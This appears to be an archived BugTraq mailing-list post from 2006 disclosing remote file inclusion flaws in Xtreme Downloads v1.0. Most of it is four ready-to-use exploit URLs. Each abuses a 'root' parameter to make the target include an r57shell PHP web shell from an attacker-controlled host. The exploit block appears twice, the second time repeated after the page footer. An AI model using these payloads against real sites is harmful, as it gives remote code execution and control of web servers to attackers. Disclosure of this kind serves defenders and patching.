BugTraq
Back to list
|
Post reply
file include in Xtreme Downloads v.1.0
Jun 05 2006 08:59PM
gamr-14 hotmail com
Multiple file include exploits in Xtreme Downloads v.1.0
script type : Xtreme Downloads v.1.0
bug found by : sweet-devil
team : site-down
type : file include
####################################################
exploits :
download.php
http://www.example.com/path/download.php?root=http://yoursite/r57shell.t
xt?
manager.php
http://www.example.com/path/manager.php?root=http://yoursite/r57shell.tx
t?
category.php
http://www.example.com/path/admin\scripts/category.php?root=http://yours
ite/r57shell.txt?
add_allow.php
http://www.example.com/path/includes/add_allow.php?root=http://yoursite/
r57shell.txt?
####################################################
#######################
emails:
gamr-14 (at) hotmail (dot) com [email concealed] & black-cod3 (at) hotmail (dot) com [email concealed]
#######################
All my respect to our friends , lezr.com
done .. peace
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
script type : Xtreme Downloads v.1.0
bug found by : sweet-devil
team : site-down
type : file include
####################################################
exploits :
download.php
http://www.example.com/path/download.php?root=http://yoursite/r57shell.t
xt?
manager.php
http://www.example.com/path/manager.php?root=http://yoursite/r57shell.tx
t?
category.php
http://www.example.com/path/admin\scripts/category.php?root=http://yours
ite/r57shell.txt?
add_allow.php
http://www.example.com/path/includes/add_allow.php?root=http://yoursite/
r57shell.txt?
####################################################
#######################
emails:
gamr-14 (at) hotmail (dot) com [email concealed] & black-cod3 (at) hotmail (dot) com [email concealed]
#######################
All my respect to our friends , lezr.com
done .. peace
[ reply ]